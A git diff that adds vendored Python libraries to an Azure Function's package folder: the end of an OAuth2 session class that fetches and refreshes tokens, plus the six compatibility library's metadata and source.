+ elif method.upper() == "GET":
+ request_kwargs["params"] = dict(urldecode(body))
+ else:
+ raise ValueError("The method kwarg must be POST or GET.")
+
+ r = self.request(
+ method=method,
+ url=token_url,
+ timeout=timeout,
+ headers=headers,
+ auth=auth,
+ verify=verify,
+ proxies=proxies,
+ cert=cert,
+ **request_kwargs
+ )
+
+ log.debug("Request to fetch token completed with status %s.", r.status_code)
+ log.debug("Request url was %s", r.request.url)
+ log.debug("Request headers were %s", r.request.headers)
+ log.debug("Request body was %s", r.request.body)
+ log.debug("Response headers were %s and content %s.", r.headers, r.text)
+ log.debug(
+ "Invoking %d token response hooks.",
+ len(self.compliance_hook["access_token_response"]),
+ )
+ for hook in self.compliance_hook["access_token_response"]:
+ log.debug("Invoking hook %s.", hook)
+ r = hook(r)
+
+ self._client.parse_request_body_response(r.text, scope=self.scope)
+ self.token = self._client.token
+ log.debug("Obtained token %s.", self.token)
+ return self.token
+
+ def token_from_fragment(self, authorization_response):
+ """Parse token from the URI fragment, used by MobileApplicationClients.
+
+ :param authorization_response: The full URL of the redirect back to you
+ :return: A token dict
+ """
+ self._client.parse_request_uri_response(
+ authorization_response, state=self._state
+ )
+ self.token = self._client.token
+ return self.token
+
+ def refresh_token(
+ self,
+ token_url,
+ refresh_token=None,
+ body="",
+ auth=None,
+ timeout=None,
+ headers=None,
+ verify=True,
+ proxies=None,
+ **kwargs
+ ):
+ """Fetch a new access token using a refresh token.
+
+ :param token_url: The token endpoint, must be HTTPS.
+ :param refresh_token: The refresh_token to use.
+ :param body: Optional application/x-www-form-urlencoded body to
+ include in the token request. Prefer kwargs over body.
+ :param auth: An auth tuple or method as accepted by `requests`.
+ :param timeout: Timeout of the request in seconds.
+ :param headers: A dict of headers to be used by `requests`.
+ :param verify: Verify SSL certificate.
+ :param proxies: The `proxies` argument will be passed to `requests`.
+ :param kwargs: Extra parameters to include in the token request.
+ :return: A token dict
+ """
+ if not token_url:
+ raise ValueError("No token endpoint set for auto_refresh.")
+
+ if not is_secure_transport(token_url):
+ raise InsecureTransportError()
+
+ refresh_token = refresh_token or self.token.get("refresh_token")
+
+ log.debug(
+ "Adding auto refresh keyword arguments %s.", self.auto_refresh_kwargs
+ )
+ kwargs.update(self.auto_refresh_kwargs)
+ body = self._client.prepare_refresh_body(
+ body=body, refresh_token=refresh_token, scope=self.scope, **kwargs
+ )
+ log.debug("Prepared refresh token request body %s", body)
+
+ if headers is None:
+ headers = {
+ "Accept": "application/json",
+ "Content-Type": ("application/x-www-form-urlencoded;charset=UTF-8"),
+ }
+
+ r = self.post(
+ token_url,
+ data=dict(urldecode(body)),
+ auth=auth,
+ timeout=timeout,
+ headers=headers,
+ verify=verify,
+ withhold_token=True,
+ proxies=proxies,
+ )
+ log.debug("Request to refresh token completed with status %s.", r.status_code)
+ log.debug("Response headers were %s and content %s.", r.headers, r.text)
+ log.debug(
+ "Invoking %d token response hooks.",
+ len(self.compliance_hook["refresh_token_response"]),
+ )
+ for hook in self.compliance_hook["refresh_token_response"]:
+ log.debug("Invoking hook %s.", hook)
+ r = hook(r)
+
+ self.token = self._client.parse_request_body_response(r.text, scope=self.scope)
+ if "refresh_token" not in self.token:
+ log.debug("No new refresh token given. Re-using old.")
+ self.token["refresh_token"] = refresh_token
+ return self.token
+
+ def request(
+ self,
+ method,
+ url,
+ data=None,
+ headers=None,
+ withhold_token=False,
+ client_id=None,
+ client_secret=None,
+ **kwargs
+ ):
+ """Intercept all requests and add the OAuth 2 token if present."""
+ if not is_secure_transport(url):
+ raise InsecureTransportError()
+ if self.token and not withhold_token:
+ log.debug(
+ "Invoking %d protected resource request hooks.",
+ len(self.compliance_hook["protected_request"]),
+ )
+ for hook in self.compliance_hook["protected_request"]:
+ log.debug("Invoking hook %s.", hook)
+ url, headers, data = hook(url, headers, data)
+
+ log.debug("Adding token %s to request.", self.token)
+ try:
+ url, headers, data = self._client.add_token(
+ url, http_method=method, body=data, headers=headers
+ )
+ # Attempt to retrieve and save new access token if expired
+ except TokenExpiredError:
+ if self.auto_refresh_url:
+ log.debug(
+ "Auto refresh is set, attempting to refresh at %s.",
+ self.auto_refresh_url,
+ )
+
+ # We mustn't pass auth twice.
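+ # Pop auth from kwargs so the refresh call below only receives it
+ # through its explicit auth= argument.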
+ auth = kwargs.pop("auth", None)
+ if client_id and client_secret and (auth is None):
+ log.debug(
+ 'Encoding client_id "%s" with client_secret as Basic auth credentials.',
+ client_id,
+ )
+ auth = requests.auth.HTTPBasicAuth(client_id, client_secret)
+ token = self.refresh_token(
+ self.auto_refresh_url, auth=auth, **kwargs
+ )
+ if self.token_updater:
+ log.debug(
+ "Updating token to %s using %s.", token, self.token_updater
+ )
+ self.token_updater(token)
+ url, headers, data = self._client.add_token(
+ url, http_method=method, body=data, headers=headers
+ )
+ else:
+ raise TokenUpdated(token)
+ else:
+ raise
+
+ log.debug("Requesting url %s using method %s.", url, method)
+ log.debug("Supplying headers %s and data %s", headers, data)
+ log.debug("Passing through keyword arguments %s.", kwargs)
+ return super(OAuth2Session, self).request(
+ method, url, headers=headers, data=data, **kwargs
+ )
+
+ def register_compliance_hook(self, hook_type, hook):
+ """Register a hook for request/response tweaking.
+
+ Available hooks are:
+ access_token_response invoked before token parsing.
+ refresh_token_response invoked before refresh token parsing.
+ protected_request invoked before making a request.
+
+ If you find a new hook is needed please send a GitHub PR
+ or open an issue.
+ """
+ if hook_type not in self.compliance_hook:
+ raise ValueError(
+ "Hook type %s is not in %s." % (hook_type, self.compliance_hook)
+ )
+ self.compliance_hook[hook_type].add(hook)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/INSTALLER
new file mode 100644
index 0000000..4660be2
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/INSTALLER
@@ -0,0 +1 @@
+pip
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/LICENSE
new file mode 100644
index 0000000..091cadd
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/LICENSE
@@ -0,0 +1,18 @@
+Copyright (c) 2010-2020 Benjamin Peterson
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of
+this software and associated documentation files (the "Software"), to deal in
+the Software without restriction, including without limitation the rights to
+use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
+the Software, and to permit persons to whom the Software is furnished to do so,
+subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
+FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
+COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
+IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
+CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/METADATA new file mode 100644 index 0000000..12828c8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/METADATA @@ -0,0 +1,49 @@ +Metadata-Version: 2.1 +Name: six +Version: 1.16.0 +Summary: Python 2 and 3 compatibility utilities +Home-page: https://github.com/benjaminp/six +Author: Benjamin Peterson +Author-email: benjamin@python.org +License: MIT +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Programming Language :: Python :: 2 +Classifier: Programming Language :: Python :: 3 +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: MIT License +Classifier: Topic :: Software Development :: Libraries +Classifier: Topic :: Utilities +Requires-Python: >=2.7, !=3.0.*, !=3.1.*, !=3.2.* + +.. image:: https://img.shields.io/pypi/v/six.svg + :target: https://pypi.org/project/six/ + :alt: six on PyPI + +.. image:: https://travis-ci.org/benjaminp/six.svg?branch=master + :target: https://travis-ci.org/benjaminp/six + :alt: six on TravisCI + +.. image:: https://readthedocs.org/projects/six/badge/?version=latest + :target: https://six.readthedocs.io/ + :alt: six's documentation on Read the Docs + +.. image:: https://img.shields.io/badge/license-MIT-green.svg + :target: https://github.com/benjaminp/six/blob/master/LICENSE + :alt: MIT License badge + +Six is a Python 2 and 3 compatibility library. It provides utility functions +for smoothing over the differences between the Python versions with the goal of +writing Python code that is compatible on both Python versions. See the +documentation for more information on what is provided. + +Six supports Python 2.7 and 3.3+. It is contained in only one Python +file, so it can be easily copied into your project. (The copyright and license +notice must be retained.) + +Online documentation is at https://six.readthedocs.io/. + +Bugs can be reported to https://github.com/benjaminp/six. The code can also +be found there. 
+ + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/RECORD new file mode 100644 index 0000000..d8c0f6c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/RECORD @@ -0,0 +1,8 @@ +__pycache__/six.cpython-39.pyc,, +six-1.16.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +six-1.16.0.dist-info/LICENSE,sha256=i7hQxWWqOJ_cFvOkaWWtI9gq3_YPI5P8J2K2MYXo5sk,1066 +six-1.16.0.dist-info/METADATA,sha256=VQcGIFCAEmfZcl77E5riPCN4v2TIsc_qtacnjxKHJoI,1795 +six-1.16.0.dist-info/RECORD,, +six-1.16.0.dist-info/WHEEL,sha256=Z-nyYpwrcSqxfdux5Mbn_DQ525iP7J2DG3JgGvOYyTQ,110 +six-1.16.0.dist-info/top_level.txt,sha256=_iVH_iYEtEXnD8nYGQYpYFUvkUW9sEO1GYbkeKSAais,4 +six.py,sha256=TOOfQi7nFGfMrIvtdr6wX4wyHH8M7aknmuLfo2cBBrM,34549 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/WHEEL new file mode 100644 index 0000000..e283ba9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.36.2) +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/top_level.txt new file mode 100644 index 0000000..1021105 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/top_level.txt @@ -0,0 +1 @@ +six diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six.py new file mode 100644 index 0000000..a02bc8c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six.py @@ -0,0 +1,998 @@ +# Copyright (c) 2010-2020 Benjamin Peterson +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. 
+ +"""Utilities for writing code that runs on Python 2 and 3""" + +from __future__ import absolute_import + +import functools +import itertools +import operator +import sys +import types + +__author__ = "Benjamin Peterson " +__version__ = "1.16.0" + + +# Useful for very coarse version differentiation. +PY2 = sys.version_info[0] == 2 +PY3 = sys.version_info[0] == 3 +PY34 = sys.version_info[0:2] >= (3, 4) + +if PY3: + string_types = str, + integer_types = int, + class_types = type, + text_type = str + binary_type = bytes + + MAXSIZE = sys.maxsize +else: + string_types = basestring, + integer_types = (int, long) + class_types = (type, types.ClassType) + text_type = unicode + binary_type = str + + if sys.platform.startswith("java"): + # Jython always uses 32 bits. + MAXSIZE = int((1 << 31) - 1) + else: + # It's possible to have sizeof(long) != sizeof(Py_ssize_t). + class X(object): + + def __len__(self): + return 1 << 31 + try: + len(X()) + except OverflowError: + # 32-bit + MAXSIZE = int((1 << 31) - 1) + else: + # 64-bit + MAXSIZE = int((1 << 63) - 1) + del X + +if PY34: + from importlib.util import spec_from_loader +else: + spec_from_loader = None + + +def _add_doc(func, doc): + """Add documentation to a function.""" + func.__doc__ = doc + + +def _import_module(name): + """Import module, returning the module after the last dot.""" + __import__(name) + return sys.modules[name] + + +class _LazyDescr(object): + + def __init__(self, name): + self.name = name + + def __get__(self, obj, tp): + result = self._resolve() + setattr(obj, self.name, result) # Invokes __set__. + try: + # This is a bit ugly, but it avoids running this again by + # removing this descriptor. + delattr(obj.__class__, self.name) + except AttributeError: + pass + return result + + +class MovedModule(_LazyDescr): + + def __init__(self, name, old, new=None): + super(MovedModule, self).__init__(name) + if PY3: + if new is None: + new = name + self.mod = new + else: + self.mod = old + + def _resolve(self): + return _import_module(self.mod) + + def __getattr__(self, attr): + _module = self._resolve() + value = getattr(_module, attr) + setattr(self, attr, value) + return value + + +class _LazyModule(types.ModuleType): + + def __init__(self, name): + super(_LazyModule, self).__init__(name) + self.__doc__ = self.__class__.__doc__ + + def __dir__(self): + attrs = ["__doc__", "__name__"] + attrs += [attr.name for attr in self._moved_attributes] + return attrs + + # Subclasses should override this + _moved_attributes = [] + + +class MovedAttribute(_LazyDescr): + + def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None): + super(MovedAttribute, self).__init__(name) + if PY3: + if new_mod is None: + new_mod = name + self.mod = new_mod + if new_attr is None: + if old_attr is None: + new_attr = name + else: + new_attr = old_attr + self.attr = new_attr + else: + self.mod = old_mod + if old_attr is None: + old_attr = name + self.attr = old_attr + + def _resolve(self): + module = _import_module(self.mod) + return getattr(module, self.attr) + + +class _SixMetaPathImporter(object): + + """ + A meta path importer to import six.moves and its submodules. + + This class implements a PEP302 finder and loader. It should be compatible + with Python 2.5 and all existing versions of Python3 + """ + + def __init__(self, six_module_name): + self.name = six_module_name + self.known_modules = {} + + def _add_module(self, mod, *fullnames): + for fullname in fullnames: + self.known_modules[self.name + "." 
+ fullname] = mod + + def _get_module(self, fullname): + return self.known_modules[self.name + "." + fullname] + + def find_module(self, fullname, path=None): + if fullname in self.known_modules: + return self + return None + + def find_spec(self, fullname, path, target=None): + if fullname in self.known_modules: + return spec_from_loader(fullname, self) + return None + + def __get_module(self, fullname): + try: + return self.known_modules[fullname] + except KeyError: + raise ImportError("This loader does not know module " + fullname) + + def load_module(self, fullname): + try: + # in case of a reload + return sys.modules[fullname] + except KeyError: + pass + mod = self.__get_module(fullname) + if isinstance(mod, MovedModule): + mod = mod._resolve() + else: + mod.__loader__ = self + sys.modules[fullname] = mod + return mod + + def is_package(self, fullname): + """ + Return true, if the named module is a package. + + We need this method to get correct spec objects with + Python 3.4 (see PEP451) + """ + return hasattr(self.__get_module(fullname), "__path__") + + def get_code(self, fullname): + """Return None + + Required, if is_package is implemented""" + self.__get_module(fullname) # eventually raises ImportError + return None + get_source = get_code # same as get_code + + def create_module(self, spec): + return self.load_module(spec.name) + + def exec_module(self, module): + pass + +_importer = _SixMetaPathImporter(__name__) + + +class _MovedItems(_LazyModule): + + """Lazy loading of moved objects""" + __path__ = [] # mark as package + + +_moved_attributes = [ + MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"), + MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"), + MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"), + MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"), + MovedAttribute("intern", "__builtin__", "sys"), + MovedAttribute("map", "itertools", "builtins", "imap", "map"), + MovedAttribute("getcwd", "os", "os", "getcwdu", "getcwd"), + MovedAttribute("getcwdb", "os", "os", "getcwd", "getcwdb"), + MovedAttribute("getoutput", "commands", "subprocess"), + MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute("reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload"), + MovedAttribute("reduce", "__builtin__", "functools"), + MovedAttribute("shlex_quote", "pipes", "shlex", "quote"), + MovedAttribute("StringIO", "StringIO", "io"), + MovedAttribute("UserDict", "UserDict", "collections"), + MovedAttribute("UserList", "UserList", "collections"), + MovedAttribute("UserString", "UserString", "collections"), + MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute("zip", "itertools", "builtins", "izip", "zip"), + MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"), + MovedModule("builtins", "__builtin__"), + MovedModule("configparser", "ConfigParser"), + MovedModule("collections_abc", "collections", "collections.abc" if sys.version_info >= (3, 3) else "collections"), + MovedModule("copyreg", "copy_reg"), + MovedModule("dbm_gnu", "gdbm", "dbm.gnu"), + MovedModule("dbm_ndbm", "dbm", "dbm.ndbm"), + MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread" if sys.version_info < (3, 9) else "_thread"), + MovedModule("http_cookiejar", "cookielib", "http.cookiejar"), + MovedModule("http_cookies", "Cookie", "http.cookies"), + MovedModule("html_entities", "htmlentitydefs", "html.entities"), + 
MovedModule("html_parser", "HTMLParser", "html.parser"), + MovedModule("http_client", "httplib", "http.client"), + MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"), + MovedModule("email_mime_image", "email.MIMEImage", "email.mime.image"), + MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"), + MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"), + MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"), + MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"), + MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"), + MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"), + MovedModule("cPickle", "cPickle", "pickle"), + MovedModule("queue", "Queue"), + MovedModule("reprlib", "repr"), + MovedModule("socketserver", "SocketServer"), + MovedModule("_thread", "thread", "_thread"), + MovedModule("tkinter", "Tkinter"), + MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"), + MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"), + MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"), + MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"), + MovedModule("tkinter_tix", "Tix", "tkinter.tix"), + MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"), + MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"), + MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"), + MovedModule("tkinter_colorchooser", "tkColorChooser", + "tkinter.colorchooser"), + MovedModule("tkinter_commondialog", "tkCommonDialog", + "tkinter.commondialog"), + MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"), + MovedModule("tkinter_font", "tkFont", "tkinter.font"), + MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"), + MovedModule("tkinter_tksimpledialog", "tkSimpleDialog", + "tkinter.simpledialog"), + MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"), + MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"), + MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"), + MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"), + MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"), + MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"), +] +# Add windows specific modules. +if sys.platform == "win32": + _moved_attributes += [ + MovedModule("winreg", "_winreg"), + ] + +for attr in _moved_attributes: + setattr(_MovedItems, attr.name, attr) + if isinstance(attr, MovedModule): + _importer._add_module(attr, "moves." 
+ attr.name) +del attr + +_MovedItems._moved_attributes = _moved_attributes + +moves = _MovedItems(__name__ + ".moves") +_importer._add_module(moves, "moves") + + +class Module_six_moves_urllib_parse(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_parse""" + + +_urllib_parse_moved_attributes = [ + MovedAttribute("ParseResult", "urlparse", "urllib.parse"), + MovedAttribute("SplitResult", "urlparse", "urllib.parse"), + MovedAttribute("parse_qs", "urlparse", "urllib.parse"), + MovedAttribute("parse_qsl", "urlparse", "urllib.parse"), + MovedAttribute("urldefrag", "urlparse", "urllib.parse"), + MovedAttribute("urljoin", "urlparse", "urllib.parse"), + MovedAttribute("urlparse", "urlparse", "urllib.parse"), + MovedAttribute("urlsplit", "urlparse", "urllib.parse"), + MovedAttribute("urlunparse", "urlparse", "urllib.parse"), + MovedAttribute("urlunsplit", "urlparse", "urllib.parse"), + MovedAttribute("quote", "urllib", "urllib.parse"), + MovedAttribute("quote_plus", "urllib", "urllib.parse"), + MovedAttribute("unquote", "urllib", "urllib.parse"), + MovedAttribute("unquote_plus", "urllib", "urllib.parse"), + MovedAttribute("unquote_to_bytes", "urllib", "urllib.parse", "unquote", "unquote_to_bytes"), + MovedAttribute("urlencode", "urllib", "urllib.parse"), + MovedAttribute("splitquery", "urllib", "urllib.parse"), + MovedAttribute("splittag", "urllib", "urllib.parse"), + MovedAttribute("splituser", "urllib", "urllib.parse"), + MovedAttribute("splitvalue", "urllib", "urllib.parse"), + MovedAttribute("uses_fragment", "urlparse", "urllib.parse"), + MovedAttribute("uses_netloc", "urlparse", "urllib.parse"), + MovedAttribute("uses_params", "urlparse", "urllib.parse"), + MovedAttribute("uses_query", "urlparse", "urllib.parse"), + MovedAttribute("uses_relative", "urlparse", "urllib.parse"), +] +for attr in _urllib_parse_moved_attributes: + setattr(Module_six_moves_urllib_parse, attr.name, attr) +del attr + +Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes + +_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"), + "moves.urllib_parse", "moves.urllib.parse") + + +class Module_six_moves_urllib_error(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_error""" + + +_urllib_error_moved_attributes = [ + MovedAttribute("URLError", "urllib2", "urllib.error"), + MovedAttribute("HTTPError", "urllib2", "urllib.error"), + MovedAttribute("ContentTooShortError", "urllib", "urllib.error"), +] +for attr in _urllib_error_moved_attributes: + setattr(Module_six_moves_urllib_error, attr.name, attr) +del attr + +Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes + +_importer._add_module(Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"), + "moves.urllib_error", "moves.urllib.error") + + +class Module_six_moves_urllib_request(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_request""" + + +_urllib_request_moved_attributes = [ + MovedAttribute("urlopen", "urllib2", "urllib.request"), + MovedAttribute("install_opener", "urllib2", "urllib.request"), + MovedAttribute("build_opener", "urllib2", "urllib.request"), + MovedAttribute("pathname2url", "urllib", "urllib.request"), + MovedAttribute("url2pathname", "urllib", "urllib.request"), + MovedAttribute("getproxies", "urllib", "urllib.request"), + MovedAttribute("Request", "urllib2", "urllib.request"), + MovedAttribute("OpenerDirector", "urllib2", "urllib.request"), + MovedAttribute("HTTPDefaultErrorHandler", 
"urllib2", "urllib.request"), + MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"), + MovedAttribute("ProxyHandler", "urllib2", "urllib.request"), + MovedAttribute("BaseHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"), + MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"), + MovedAttribute("FileHandler", "urllib2", "urllib.request"), + MovedAttribute("FTPHandler", "urllib2", "urllib.request"), + MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"), + MovedAttribute("UnknownHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"), + MovedAttribute("urlretrieve", "urllib", "urllib.request"), + MovedAttribute("urlcleanup", "urllib", "urllib.request"), + MovedAttribute("URLopener", "urllib", "urllib.request"), + MovedAttribute("FancyURLopener", "urllib", "urllib.request"), + MovedAttribute("proxy_bypass", "urllib", "urllib.request"), + MovedAttribute("parse_http_list", "urllib2", "urllib.request"), + MovedAttribute("parse_keqv_list", "urllib2", "urllib.request"), +] +for attr in _urllib_request_moved_attributes: + setattr(Module_six_moves_urllib_request, attr.name, attr) +del attr + +Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes + +_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"), + "moves.urllib_request", "moves.urllib.request") + + +class Module_six_moves_urllib_response(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_response""" + + +_urllib_response_moved_attributes = [ + MovedAttribute("addbase", "urllib", "urllib.response"), + MovedAttribute("addclosehook", "urllib", "urllib.response"), + MovedAttribute("addinfo", "urllib", "urllib.response"), + MovedAttribute("addinfourl", "urllib", "urllib.response"), +] +for attr in _urllib_response_moved_attributes: + setattr(Module_six_moves_urllib_response, attr.name, attr) +del attr + +Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes + +_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"), + "moves.urllib_response", "moves.urllib.response") + + +class Module_six_moves_urllib_robotparser(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_robotparser""" + + +_urllib_robotparser_moved_attributes = [ + MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"), +] +for attr in _urllib_robotparser_moved_attributes: + setattr(Module_six_moves_urllib_robotparser, attr.name, attr) +del attr + +Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes + +_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"), + "moves.urllib_robotparser", "moves.urllib.robotparser") + + +class 
Module_six_moves_urllib(types.ModuleType): + + """Create a six.moves.urllib namespace that resembles the Python 3 namespace""" + __path__ = [] # mark as package + parse = _importer._get_module("moves.urllib_parse") + error = _importer._get_module("moves.urllib_error") + request = _importer._get_module("moves.urllib_request") + response = _importer._get_module("moves.urllib_response") + robotparser = _importer._get_module("moves.urllib_robotparser") + + def __dir__(self): + return ['parse', 'error', 'request', 'response', 'robotparser'] + +_importer._add_module(Module_six_moves_urllib(__name__ + ".moves.urllib"), + "moves.urllib") + + +def add_move(move): + """Add an item to six.moves.""" + setattr(_MovedItems, move.name, move) + + +def remove_move(name): + """Remove item from six.moves.""" + try: + delattr(_MovedItems, name) + except AttributeError: + try: + del moves.__dict__[name] + except KeyError: + raise AttributeError("no such move, %r" % (name,)) + + +if PY3: + _meth_func = "__func__" + _meth_self = "__self__" + + _func_closure = "__closure__" + _func_code = "__code__" + _func_defaults = "__defaults__" + _func_globals = "__globals__" +else: + _meth_func = "im_func" + _meth_self = "im_self" + + _func_closure = "func_closure" + _func_code = "func_code" + _func_defaults = "func_defaults" + _func_globals = "func_globals" + + +try: + advance_iterator = next +except NameError: + def advance_iterator(it): + return it.next() +next = advance_iterator + + +try: + callable = callable +except NameError: + def callable(obj): + return any("__call__" in klass.__dict__ for klass in type(obj).__mro__) + + +if PY3: + def get_unbound_function(unbound): + return unbound + + create_bound_method = types.MethodType + + def create_unbound_method(func, cls): + return func + + Iterator = object +else: + def get_unbound_function(unbound): + return unbound.im_func + + def create_bound_method(func, obj): + return types.MethodType(func, obj, obj.__class__) + + def create_unbound_method(func, cls): + return types.MethodType(func, None, cls) + + class Iterator(object): + + def next(self): + return type(self).__next__(self) + + callable = callable +_add_doc(get_unbound_function, + """Get the function out of a possibly unbound function""") + + 